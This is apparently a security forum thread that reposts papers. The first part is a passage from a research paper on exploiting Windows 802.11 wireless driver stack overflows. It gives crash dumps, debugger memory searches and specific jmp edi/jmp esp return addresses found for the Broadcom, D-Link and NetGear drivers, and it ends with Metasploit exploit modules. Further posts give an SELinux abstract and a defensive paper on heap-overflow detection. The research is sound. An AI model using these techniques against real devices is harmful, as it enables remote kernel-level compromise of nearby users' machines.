arbitrary code. | \_ Overwritten with 0x8055010d which points to the payload \_ Start of SSID that is mangled after the overflow occurs. Transmitting a buffer that is structured as shown above does indeed result in a bluescreen. It is possible to differentiate actual crashes from those generated as the result of an int3 by looking at the bugcheck information. The use of an int3 will result in an unhandled kernel mode exception which is bugcheck code 0x8e. Furthermore, the exception code information associated with this (the first parameter of the exception) will be set to 0x80000003. Exception code 0x80000003 is used to indicate that the unhandled exception was associated with a trap instruction. This is generally a good indication that the arbitrary code you specified has executed. It's also very useful in situations where it is not possible to do remote kernel debugging and one must rely on strictly using crash dump analysis. KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e) This is a very common bugcheck. Usually the exception address pinpoints the driver/function that caused the problem. Always note this address as well as the link date of the driver/image that contains this address. Some common problems are exception code 0x80000003. This means a hard coded breakpoint or assertion was hit, but this system was booted /NODEBUG. This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted /DEBUG. This will let us see why this breakpoint is happening. Arguments: Arg1: 80000003, The exception code that was not handled Arg2: 8055010d, The address that the exception occurred at Arg3: 80550088, Trap Frame Arg4: 00000000 ... TRAP_FRAME: 80550088 -- (.trap ffffffff80550088) ErrCode = 00000000 eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 nt!KiDoubleFaultStack+0x2c8e: 8055010e cc int 3 ... STACK_TEXT: 8054fc50 8051d6a7 0000008e 80000003 8055010d nt!KeBugCheckEx+0x1b 80550018 804df235 80550034 00000000 80550088 nt!KiDispatchException+0x3b1 80550080 804df947 8055010d 8055010e badb0d00 nt!CommonDispatchException+0x4d 80550080 8055010e 8055010d 8055010e badb0d00 nt!KiTrap03+0xad 8055010d cccccccc cccccccc cccccccc cccccccc nt!KiDoubleFaultStack+0x2c8e WARNING: Frame IP not in any known module. Following frames may be wrong. 80550111 cccccccc cccccccc cccccccc cccccccc 0xcccccccc 80550115 cccccccc cccccccc cccccccc cccccccc 0xcccccccc 80550119 cccccccc cccccccc cccccccc cccccccc 0xcccccccc 8055011d cccccccc cccccccc cccccccc cccccccc 0xcccccccc The above crash dump information definitely shows that arbitrary code execution has been achieved. This is a big milestone. It pretty much proves that exploitation will be possible. However, it doesn't prove how reliable or portable it will be. For that reason, the next step involves identifying changes to the exploit that will make it more reliable and portable from one machine to the next. Fortunately, the current situation already appears like it might afford a good degree of portability, as the stack addresses don't appear to shift around from one crash to the next. At this stage, the return address is being overwritten with a hard-coded stack address that points immediately after the return address in the buffer. One of the problems with this is that the amount of space immediately following the return address is limited to 163 bytes due to the maximum size of the SSID IE. This is enough room for small stub of a payload, but probably not large enough for a payload that would provide anything interesting in terms of features. It's also worth noting that overwriting past the return address might overwrite some important elements on the stack that could lead to the system crashing at some later point for hard to explain reasons. When dealing with kernel-mode vulnerabilities, it is advised that one attempt to clobber the least amount of state as possible in order to reduce the amount of collateral damage that might ensue. Limiting the amount of data that is used in the overflow to only the amount needed to trigger the overwriting of the return address means that the total size for the SSID IE will be limited and not suitable to hold arbitrary code. However, there's no reason why code couldn't be placed in a completely separate IE unrelated to the SSID. This means we could transmit a packet that included both the bogus SSID IE and another arbitrary IE which would be used to contain the arbitrary code. Although this would work, it must be possible to find a reference to the arbitrary IE that contains the arbitrary code. One approach that might be taken to do this would be to search the address space for an intact copy of the 802.11 packet that is transmitted. Before going down that path, it makes sense to try to find instances of the packet in memory using the kernel debugger. A simple search of the address space using the destination MAC address of the packet sent is a good way to find potential matches. In this case, the destination MAC is 00:14:a5:06:8f:e6. kd> .ignore_missing_pages 1 Suppress kernel summary dump missing page error message kd> s 0x80000000 L?10000000 00 14 a5 06 8f e6 8418588a 00 14 a5 06 8f e6 ff ff-ff ff ff ff 40 0e 00 00 ............@... 841b0006 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................ 841b1534 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................ 84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845dc028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845de828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845df828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f3028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f3828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f4028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f5028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 84642d4c 00 14 a5 06 8f e6 00 00-f0 c6 2a 85 00 00 00 00 ..........*..... 846d6d4c 00 14 a5 06 8f e6 00 00-80 79 21 85 00 00 00 00 .........y!..... 84eda06c 00 14 a5 06 8f e6 02 06-01 01 00 0e 00 00 00 00 ................ 84efdecc 00 14 a5 06 8f e6 00 00-65 00 00 00 16 00 25 0a ........e.....%. The above output shows that quite a few matches were found One important thing to note is that the BSSID used in the packet that contained the overly sized SSID was 00:07:0e:01:02:03. In an 802.11 header, the addresses of Management packets are arranged in order of DST, SRC, BSSID. While some of the above matches do not appear to contain the entire packet contents, many of them do. Picking one of the matches at random shows the contents in more detail: kd> db 84223028 L 128 84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 84223038 02 03 d0 cf 85 b1 b3 db-01 00 00 00 64 00 11 04 ............d... 84223048 00 ff 4a 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d ..J..U...U...U.. 84223058 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223068 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223078 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223088 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223098 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 842230a8 01 55 80 cc cc cc cc cc-cc cc cc cc cc cc cc cc .U.............. 842230b8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230c8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230d8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230e8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230f8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 84223108 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ Indeed, this does appear to be a full copy of the original packet. The reason why there are so many copies of the packet in memory might be related to the fact that the current form of the exploit is transmitting packets in an infinite loop, thus causing the driver to have a few copies lingering in memory. The fact that multiple copies exist in memory is good news considering it increases the number of places that could be used for return addresses. However, it's not as simple as hard-coding one of these addresses into the exploit considering pool allocated addresses will not be predictable. Instead, steps will need to be taken to attempt to find a reference to the packet through a register or through some other context. In this way, a very small stub could be placed after the return address in the buffer that would immediately transfer control into the a copy of the packet somewhere else in memory. Although some initial work with the debugger showed a couple of references to the original packet on the stack, a much simpler solution was identified. Consider the following register context at the time of the crash: kd> r Last set context: eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 nt!KiDoubleFaultStack+0x2c8e: 8055010e cc int 3 Inspecting each of these registers individually eventually shows that the edi register is pointing into a copy of the packet. kd> db edi 845f302e 00 07 0e 01 02 03 00 07-0e 01 02 03 10 cf 85 b1 ................ 845f303e b3 db 01 00 00 00 64 00-11 04 00 ff 4a 0d 01 55 ......d.....J..U 845f304e 80 0d 01 55 80 0d 01 55-80 0d 01 55 80 0d 01 55 ...U...U...U...U As chance would have it, edi is pointing to the source MAC in the 802.11 packet that was sent. If it had instead been pointing to the destination MAC or the end of the packet, it would not have been of any use. With edi being pointed to the source MAC, the rest of the cards fall into place. The hard-coded stack address that was previously used to overwrite the return address can be replaced with an address (probably inside ntoskrnl.exe) that contains the equivalent of a jmp edi instruction. When the exploit is triggered and the vulnerable function returns, it will transfer control to the location that contains the jmp edi. The jmp edi, in turn, transfers control to the first byte of the source MAC. By setting the source MAC to some executable code, such as a relative jump instruction, it is possible to finally transfer control into a location of the packet that contains the arbitrary code that should be executed. This solves the problem of using the hard-coded stack address as the return address and should help to make the exploit more reliable and portable between targets. However, this portability will be limited by the location of the jmp edi instruction that is used when overwriting the return address. Finding the location of a jmp edi instruction is relatively simple, although more effective measures could be use to cross-reference addresses in an effort to find something more portable Experimentation shows that 0x8066662c is a reliable location: kd> s nt L?10000000 ff e7 8063abce ff e7 ff 21 47 70 21 83-98 03 00 00 eb 38 80 3d ...!Gp!......8.= 806590ca ff e7 ff 5f eb 05 bb 22-00 00 c0 8b ce e8 74 ff ..._..."......t. 806590d9 ff e7 ff 5e 8b c3 5b c9-c2 08 00 cc cc cc cc cc ...^..[......... 8066662c ff e7 ff 8b d8 85 db 74-e0 33 d2 42 8b cb e8 d7 .......t.3.B.... 806bb44b ff e7 a3 6c ff a2 42 08-ff 3f 2a 1e f0 04 04 04 ...l..B..?*..... ... With the exploit all but finished, the final question that remains unanswered is where the arbitrary code should be placed in the 802.11 packet. There are a few different ways that this could be tackled. The simplest solution to the problem would be to simply append the arbitrary code immediately after the SSID in the packet. However, this would make the packet malformed and might cause the driver to drop it. Alternatively, an arbitrary IE, such as a WPA IE, could be used as a container for the arbitrary code as suggested earlier in this section. For now, the authors decided to take the middle road. By default, a WPA IE will be used as the container for all payloads, regardless of whether or not the payloads fit within the IE. This has the effect of allowing all payloads smaller than 256 bytes to be part of a well-formed packet. Payloads that are larger than 255 bytes will cause the packet to be malformed, but perhaps not enough to cause the driver to drop the packet. An alternate solution to this issue can be found in the NetGear case study. At this point, the structure of the buffer and the packet as a whole have been completely researched and are ready to be tested. The only thing left to do is incorporate the arbitrary code that was described in 4.1. Much time was spent debugging and improving the code that was used in order to produce a reliable exploit. 5.2) D-Link Soon after the Broadcom exploit was completed, the authors decided to write a suite of fuzzing modules that could discover similar issues in other wireless drivers. The first casualty of this process was the A5AGU.SYS driver provided with the D-Link's DWL-G132 USB wireless adapter. The authors configured the test machine (Windows XP SP2) so that a complete snapshot of kernel memory was included in the system crash dumps. This ensures that when a crash occurs, enough useful information is there to debug the problem. Next, the latest driver for the target device (v1.0.1.41) was installed. Finally, the beacon fuzzing module was started and the card was inserted into the USB port of the test system. Five seconds later, a beautiful blue screen appeared while the crash dump was written to disk. DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: 56149a1b, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: 56149a1b, address which referenced memory ErrCode = 00000000 eax=00000000 ebx=82103ce0 ecx=00000002 edx=82864dd0 esi=f24105dc edi=8263b7a6 eip=56149a1b esp=80550658 ebp=82015000 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 56149a1b ?? ??? Resetting default scope LAST_CONTROL_TRANSFER: from 56149a1b to 804e2158 FAILED_INSTRUCTION_ADDRESS: +56149a1b 56149a1b ?? ??? STACK_TEXT: 805505e4 56149a1b badb0d00 82864dd0 00000000 nt!KiTrap0E+0x233 80550654 82015000 82103ce0 81f15e10 8263b79c 0x56149a1b 80550664 f2408d54 81f15e10 82103c00 82015000 0x82015000 80550694 f24019cc 82015000 82103ce0 82015000 A5AGU+0x28d54 805506b8 f2413540 824ff008 0000000b 82015000 A5AGU+0x219cc 805506d8 f2414fae 824ff008 0000000b 0000000c A5AGU+0x33540 805506f4 f24146ae f241d328 8263b760 81f75000 A5AGU+0x34fae 80550704 f2417197 824ff008 00000001 8263b760 A5AGU+0x346ae 80550728 804e42cc 00000000 821f0008 00000000 A5AGU+0x37197 80550758 f74acee5 821f0008 822650a8 829fb028 nt!IopfCompleteRequest+0xa2 805507c0 f74adb57 8295a258 00000000 829fb7d8 USBPORT!USBPORT_CompleteTransfer+0x373 805507f0 f74ae754 026e6f44 829fb0e0 829fb0e0 USBPORT!USBPORT_DoneTransfer+0x137 80550828 f74aff6a 829fb028 804e3579 829fb230 USBPORT!USBPORT_FlushDoneTransferList+0x16c 80550854 f74bdfb0 829fb028 804e3579 829fb028 USBPORT!USBPORT_DpcWorker+0x224 80550890 f74be128 829fb028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e 805508ac 804dc179 829fb64c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 Five seconds of fuzzing had produced a flaw that made it possible to gain control of the instruction pointer. In order to execute arbitrary code, however, a contextual reference to the malicious frame had to be located. In this case, the edi register pointed into the source address field of the frame in just the same way that it did in the Broadcom vulnerability. The bogus eip value can be found just past the source address where one would expect it -- inside one of the randomly generated information elements. kd> dd 0x8263b7a6 (edi) 8263b7a6 f3793ee8 3ee8a34e a34ef379 6eb215f0 8263b7b6 fde19019 006431d8 9b001740 63594364 kd> s 0x8263b7a6 Lffff 0x1b 0x9a 0x14 0x56 8263bd2b 1b 9a 14 56 2a 85 56 63-00 55 0c 0f 63 6e 17 51 ...V*.Vc.U..cn.Q The next step was to determine what information element was causing the crash. After decoding the in-memory version of the frame, a series of modifications and retransmissions were made until the specific information element leading to the crash was found. Through this method it was determined that a long Supported Rates information element triggers the stack overflow shown in the crash above. Exploiting this flaw involved finding a return address in memory that pointed to a jmp edi, call edi, or push edi; ret instruction sequence. This was accomplished by running the msfpescan application included with the Metasploit Framework against the ntoskrnl.exe of our target. The resulting addresses had to be adjusted to account for the kernel's base address. The address that was chosen for this version of ntoskrnl.exe was 0x804f16eb ( 0x800d7000 + 0x0041a6eb ). $ msfpescan ntoskrnl.exe -j edi [ntoskrnl.exe] 0x0040365d push edi; retn 0x0001 0x00405aab call edi 0x00409d56 push edi; ret 0x0041a6eb jmp edi Finally, the magic frame was reworked into an exploit module for the 3.0 version of the Metasploit Framework. When the exploit is launched, a stack overflow occurs, the return address is overwritten with the location of a jmp edi, which in turn lands on the source address of the frame. The source address was modified to be a valid x86 relative jump, which directs execution into the body of the first information element. The maximum MTU of 802.11b is over 2300 bytes, allowing for payloads of up to 1000 bytes without running into reliability issues. Since this exploit is sent to the broadcast address, all vulnerable clients within range of the attacker are exploited with a single frame. 5.3) NetGear For the next test, the authors chose NetGear's WG111v2 USB wireless adapter. The machine used in the D-Link exploit was reused for this test (Windows XP SP2). The latest version of the WG111v2.SYS driver (v5.1213.6.316) was installed, the beacon fuzzer was started, and the adapter was connected to the test system. After about ten seconds, the system crashed and another gorgeous blue screen appeared. DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: dfa6e83c, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: dfa6e83c, address which referenced memory ErrCode = 00000000 eax=80550000 ebx=825c700c ecx=00000005 edx=f30e0000 esi=82615000 edi=825c7012 eip=dfa6e83c esp=80550684 ebp=b90ddf78 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 dfa6e83c ?? ??? Resetting default scope LAST_CONTROL_TRANSFER: from dfa6e83c to 804e2158 FAILED_INSTRUCTION_ADDRESS: +ffffffffdfa6e83c dfa6e83c ?? ??? STACK_TEXT: 80550610 dfa6e83c badb0d00 f30e0000 0b9e1a2b nt!KiTrap0E+0x233 WARNING: Frame IP not in any known module. Following frames may be wrong. 80550680 79e1538d 14c4f76f 8c1cec8e ea20f5b9 0xdfa6e83c 80550684 14c4f76f 8c1cec8e ea20f5b9 63a92305 0x79e1538d 80550688 8c1cec8e ea20f5b9 63a92305 115cab0c 0x14c4f76f 8055068c ea20f5b9 63a92305 115cab0c c63e58cc 0x8c1cec8e 80550690 63a92305 115cab0c c63e58cc 6d90e221 0xea20f5b9 80550694 115cab0c c63e58cc 6d90e221 78d94283 0x63a92305 80550698 c63e58cc 6d90e221 78d94283 2b828309 0x115cab0c 8055069c 6d90e221 78d94283 2b828309 39d51a89 0xc63e58cc 805506a0 78d94283 2b828309 39d51a89 0f8524ea 0x6d90e221 805506a4 2b828309 39d51a89 0f8524ea c8f0583a 0x78d94283 805506a8 39d51a89 0f8524ea c8f0583a 7e98cd49 0x2b828309 805506ac 0f8524ea c8f0583a 7e98cd49 214b52ab 0x39d51a89 805506b0 c8f0583a 7e98cd49 214b52ab 139ef137 0xf8524ea 805506b4 7e98cd49 214b52ab 139ef137 a7693fa7 0xc8f0583a 805506b8 214b52ab 139ef137 a7693fa7 dfad502f 0x7e98cd49 805506bc 139ef137 a7693fa7 dfad502f 81212de6 0x214b52ab 805506c0 a7693fa7 dfad502f 81212de6 c46a3b2e 0x139ef137 805507c0 f74a1b57 825f1e40 00000000 829a87d8 0xa7693fa7 805507f0 f74a2754 026e6f44 829a80e0 829a80e0 USBPORT!USBPORT_DoneTransfer+0x137 80550828 f74a3f6a 829a8028 804e3579 829a8230 USBPORT!USBPORT_FlushDoneTransferList+0x16c 80550854 f74b1fb0 829a8028 804e3579 829a8028 USBPORT!USBPORT_DpcWorker+0x224 80550890 f74b2128 829a8028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e 805508ac 804dc179 829a864c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 The crash indicates that not only did the fuzzer gain control of the driver's execution address, but the entire stack frame was smashed as well. The esp register points about a thousand bytes into the frame and the bogus eip value inside another controlled area. kd> dd 80550684 80550684 79e1538d 14c4f76f 8c1cec8e ea20f5b9 80550694 63a92305 115cab0c c63e58cc 6d90e221 kd> s 0x80550600 Lffff 0x3c 0xe8 0xa6 0xdf 80550608 3c e8 a6 df 10 06 55 80-78 df 0d b9 3c e8 a6 df <.....U.x...<... 80550614 3c e8 a6 df 00 0d db ba-00 00 0e f3 2b 1a 9e 0b <...........+... 80550678 3c e8 a6 df 08 00 00 00-46 02 01 00 8d 53 e1 79 <.......F....S.y 8055a524 3c e8 a6 df 02 00 00 00-00 00 00 00 3c e8 a6 df <...........<... 8055a530 3c e8 a6 df 00 40 00 e1-00 00 00 00 00 00 00 00 <....@.......... Analyzing this bug took a lot more time than one might expect. Suprisingly, there is no single field or information element that triggers this flaw. Any series of information elements with a length greater than 1100 bytes will trigger the overflow if the SSID, Supported Rates, and Channel information elements are at the beginning. The driver will discard any frames where the IE chain is truncated or extends beyond the boundaries of the received frame. This was an annoyance, since a payload may be of arbitrary length and content and may not neatly fit into a 255 byte block of data (the maximum for a single IE). The solution was to treat the blob of padding and shellcode like a contiguous IE chain and pad the buffer based on the content and length of the frame. The exploit code would generate the buffer, then walk through the buffer as if it was a series of IEs, extending the very last IE via randomized padding. This results in a chain of garbage information elements which pass the driver's sanity checks and allows for clean exploitation. For this bug, the esp register was the only one pointing into controlled data. This introduced another problem -- before the vulnerable function returned, it modified stack variables and left parts of the frame corrupted. Although the area pointed to by esp was stable, a corrupted block exists just beyond it. To solve this, a tiny block of assembly code was added to the exploit that, when executed, would jump to the real payload by calculating an offset from the eax register. Finding a jmp esp instruction was as simple as running msfpescan on ntoskrnl.exe and adjusting it for the kernel base address. The address that was chosen for this version of ntoskrnl.exe was 0x804ed5cb (0x800d7000 + 0x004165cb). $ msfpescan ntoskrnl.exe -j esp [ntoskrnl.exe] 0x004165cb jmp esp 6) Conclusion Technology that can be used to help prevent the exploitation of user-mode vulnerabilities is now becoming common place on modern desktop platforms. This represents a marked improvement that should, in the long run, make the exploitation of many user-mode vulnerabilities much more difficult or even impossible. That being said, there is an apparent lack of equivalent technology that can help to prevent the exploitation of kernel-mode vulnerabilities. The public justification for the lack of equivalent technology typically centers around the argument that kernel-mode vulnerabilities are difficult to exploit and are too few in number to actually warrant the integration of exploit prevention features. In actuality, sad though it may seem, the justification really boils down to a business cost issue. At present, kernel-mode vulnerabilities don't account for enough money in lost revenue to support the time investment needed to implement and test kernel-mode exploit prevention features. In the interest of helping to balance the business cost equation, the authors have described a process that can be used to identify and exploit 802.11 wireless device driver vulnerabilities on Windows. This process includes steps that can be taken to fuzz the different ways in which 802.11 device drivers process 802.11 packets. In certain cases, flaws may be detected in a particular device driver's processing of certain packets, such as Beacon requests and Probe responses. When these flaws are detected, exploits can be developed using the features that have been integrated into the 3.0 version of the Metasploit Framework that help to streamline the process of transmitting crafted 802.11 packets in an effort to gain code execution. Through the description of this process, it is hoped that the reader will see that kernel-mode vulnerabilities can be just as easy to identify and exploit as user-mode. Furthermore, it is hoped that this description will help to eliminate the false impression that all kernel-mode vulnerabilities are much more difficult to exploit (keeping in mind, of course, that there are indeed kernel-mode vulnerabilities that are difficult to exploit in just the same way that there are indeed user-mode vulnerabilities that are difficult to exploit). While an emphasis has been put upon 802.11 wireless device drivers, many different device drivers have the potential for exposing vulnerabilities. Looking toward the future, there are many different opportunities for research, both from an attack and defense point of view. From an attack point of view, there's no shortage of interesting research topics. As it relates to 802.11 wireless device driver vulnerabilities, much more advanced 802.11 protocol fuzzers can be developed that are capable of reaching features exposed by all of the protocol client states rather than focusing on the unauthenticated and unassociated state. For device drivers in general, the development of fuzzers that attack the IOCTL interface exposed by device objects would provide good insight into a wide range of locally exposed vulnerabilities. Aside from techniques used to identify vulnerabilities, it's expected that researching of techniques used to actually take advantage of different types of kernel-mode vulnerabilities will continue to evolve and become more reliable. From a defense point of view, there is a definite need for research that is focused on making the exploitation of kernel-mode vulnerabilities either impossible or less reliable. It will be interesting to see what the future holds for kernel-mode vulnerabilities. Bibliography [1] bugcheck and skape. Windows Kernel-mode Payload Fundamentals. http://www.uninformed.org/?v=3&a=4&t=sumry; accessed Dec 2, 2006. [2] eEye. Remote Windows Kernel Exploitation - Step Into the Ring 0. http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf; accessed Dec 2, 2006. [3] Gast, Matthew S. 802.11 Wireless Networks - The Definitive Guide. http://www.oreilly.com/catalog/802dot11/; accessed Dec 2, 2006. [4] Lemos, Robert. Device drivers filled with flaws, threaten security. http://www.securityfocus.com/news/11189; accessed Dec 2, 2006. [5] SoBeIt. Windows Kernel Pool Overflow Exploitation. http://xcon.xfocus.org/xcon2005/archives/2005/Xcon2005_SoBeIt.pdf; accessed Dec 2, 2006. Sursa: http://www.uninformed.org/?v=6&a=2&t=txt
  13. Secure computing: SELinux Michael Wikberg Helsinki University of Technology Michael.Wikberg@wikberg.fi Abstract Using mandatory access control greatly increases the security of an operating system. SELinux, which is an implementation of Linux Security Modules (LSM), implements several measures to prevent unauthorized system usage. The security architecture used is named Flask, and provides a clean separation of security policy and enforcement. This paper is an overview of the Flask architecture and the implementation in Linux. KEYWORDS: SELinux, MAC, Security, Kernel, Linux, LSM, TE, RBAC, MLS Download: www.tml.tkk.fi/Publications/C/25/papers/Wikberg_final.pdf
  14. Run-time Detection of Heap-based Overflows William Robertson, Christopher Kruegel, Darren Mutz, and Fredrik Valeur - University of California, Santa Barbara Abstract Buffer overflows belong to the most common class of attacks on today's Internet. Although stack-based variants are still by far more frequent and well-understood, heap-based overflows have recently gained more attention. Several real-world exploits have been published that corrupt heap management information and allow arbitrary code execution with the privileges of the victim process. This paper presents a technique that protects the heap management information and allows for run-time detection of heap-based overflows. We discuss the structure of these attacks and our proposed detection scheme that has been implemented as a patch to the GNU Lib C. We report the results of our experiments, which demonstrate the detection effectiveness and performance impact of our approach. In addition, we discuss different mechanisms to deploy the memory protection. Introduction Buffer overflow exploits belong to the most feared class of attacks on today's Internet. Since buffer overflow techniques have reached a broader audience, in part due to the Morris Internet worm [1] and the Phrack article by AlephOne [2], new vulnerabilities are being discovered and exploited on a regular basis. A recent survey [3] confirms that about 50% of vulnerabilities reported to CERT are buffer overflow related. The most common type of buffer overflow attack is based on stack corruption. This variant exploits the fact that the return addresses for procedure calls are stored together with local variables on the program's stack. Overflowing a local variable can thus overwrite a return address, redirecting program flow when the function returns. This potentially allows a malicious user to execute arbitrary code. Recently, however, buffer overflows that corrupt the heap have gained more attention. Several CERT advisories [4, 5] describe exploits that affect widely deployed programs. Heap-based overflows can be divided into two classes: One class [6] comprises attacks where the overflow of a buffer allocated on the heap directly alters the content of an adjacent memory block. The other class [7, 8] comprises exploits that alter management information used by the memory manager (i.e., malloc and free functions). Most malloc implementations share the behavior of storing management information within the heap space itself. The central idea of the attack is to modify the management information in a way that will allow subsequent arbitrary memory overwrites. In this way, return addresses, linkage tables or application level data can be altered. Such an attack was first demonstrated by Solar Designer [9]. This paper introduces a technique that protects the management information of boundary-tag-based heap managers against malicious or accidental modification. The idea has been implemented in Doug Lea's malloc for GNU Lib C, version 2.3 [10], utilized by Linux and Hurd. It could, however, be easily extended to other systems such as various free BSD distributions. Using our modified C library, programs are protected against attacks that attempt to tamper with heap management information. It also helps to detect programming errors that accidentally overwrite memory chunks, although not as complete and verbose as available memory debuggers. Program recompilation is not required to enable this protection. Every application that is dynamically linked against Lib C is secured once our patch has been applied. Related Work Much research has been done on the prevention and detection of stack-based overflows. A well-known result is StackGuard [11], a compiler extension that inserts a `canary' word before each function return address on the stack. When executing a stack-based attack, the intruder attempts to overflow a local buffer allocated on the stack to alter the return address of the function that is currently executing. This might permit the attacker to redirect the flow of execution and take control of the running process. By inserting a canary word between the return address and the local variables, overflows that extend into the return address will also change this canary and thus, can be detected. There are different mechanisms to prevent an attacker from simply including the canary word in his overflow and rendering the protection ineffective. One solution is to choose a random canary value on process startup (i.e., on exec) that is infeasible to guess. Another solution uses a terminator canary that consists of four different bytes commonly utilized as string terminator characters in string manipulation library functions (such as strcpy). The idea is that the attacker is required to insert these characters in the string used to overflow the buffer to overwrite the canary and remain undetected. However, the string manipulation functions will stop when encountering a terminator character and thus, the return address remains intact. A similar idea is realized by StackShield [12]. Instead of inserting the canary into the stack, however, a second stack is kept that only stores copies of the return addresses. Before a procedure returns, the copy is compared to the original and any deviations lead to the abortion of the process. Stack-based overflows exploit the fact that management information (the function return address) and data (automatic variables and buffers) are stored together. StackGuard and StackShield are both approaches to enforcing the integrity of in-band management information on the stack. Our technique builds upon this idea and extends the protection to management information in the heap. Other solutions to prevent stack-based overflows are not enforced by the compiler but implemented as libraries. Libsafe and Libverify [13, 14] implement and override unsafe functions of the C library (such as strcpy, fscanf, getwd). The safe versions estimate a safe boundary for buffers on the stack at run-time and check this boundary before any write to a buffer is permitted. This prevents user input from overwriting the function return address. Another possibility is to make the stack segment non-executable [15]. Although this does not protect against the actual overflow and the modification of the return address, the solution is based on the observation that many exploits execute their malicious payload directly on the stack. This approach has the problem of potentially breaking legitimate uses such as functional programming languages that generate code during run-time and execute it on the stack. Also, gcc uses executable stacks as function trampolines for nested functions and Linux uses executable user stacks for signal handling. The solution to this problem is to detect legitimate uses and dynamically re-enable execution. However, this opens a window of vulnerability and is hard to do in a general way. Less work has been done on protecting heap memory. Non-executable heap extensions [16, 17] that operate similar to their non-executable stack cousins have been proposed. However, they do not prevent buffer overflows from occurring and an attacker can still modify heap management information or overwrite function pointers. They also suffer from breaking applications that dynamically generate and execute code in the heap. Systems that provide memory protection are memory debuggers, such as Valgrind [18] or Electric Fence [19]. These tools supervise memory access (read and write) and intercept memory management calls (e.g., malloc) to detect errors. These tools use an approach similar to ours in that they attempt to maintain the integrity of the utilized memory. However, a check is inserted on every memory access, while our approach only performs a check when allocating or deallocating memory chunks. Memory debuggers effectively prevent unauthorized memory access and stop heap-based buffer overflows. Yet, they also impose a serious performance penalty on the monitored programs, which often run an order of magnitude slower. This is not acceptable for most production systems. A recent posting on bugtraq pointed to an article [20] that discusses several techniques to protect stack and heap memory against overflows. The presented heap protection mechanism follows similar ideas as our work as it aims at protecting heap management information. However, no details were provided and no implementation or evaluation of their technique exists. A possibility of preventing stack-based and heap-based overflows altogether is the use of type-safe languages such as Java. Alternatively, solutions have been proposed [21] that provide safe pointers for C. All these systems can only be attacked by exploiting vulnerabilities [22, 23] in the mechanisms that enforce the type safety (e.g., bytecode verifier). Note, however, that safe C systems typically require new compilers and recompilation of all applications to be protected. Technique Heap Management in GNU Lib C (glibc) The C programming language provides no built-in facilities for performing common operations such as dynamic memory management, string manipulation or input/output. Instead, these facilities are defined in a standard library, which is compiled and linked with user applications. The GNU C library [10] is such a library that defines all library functions specified by the ISO C standard [24], as well as additional features specific to POSIX [25] and extensions specific to the GNU system [26]. Two kinds of memory allocation, static and automatic, are directly supported by the C programming language. Static allocation is used when a variable is declared as static or global. Each static or global variable defines one block of space of a fixed size. The space is allocated once, on program startup as part of the exec operation and is never freed. Automatic allocation is used for automatic variables such as a function arguments or local variables. The space for an automatic variable is automatically allocated on the stack when the compound statement containing the declaration is entered, and is freed when that compound statement is exited. A third important kind of memory allocation, 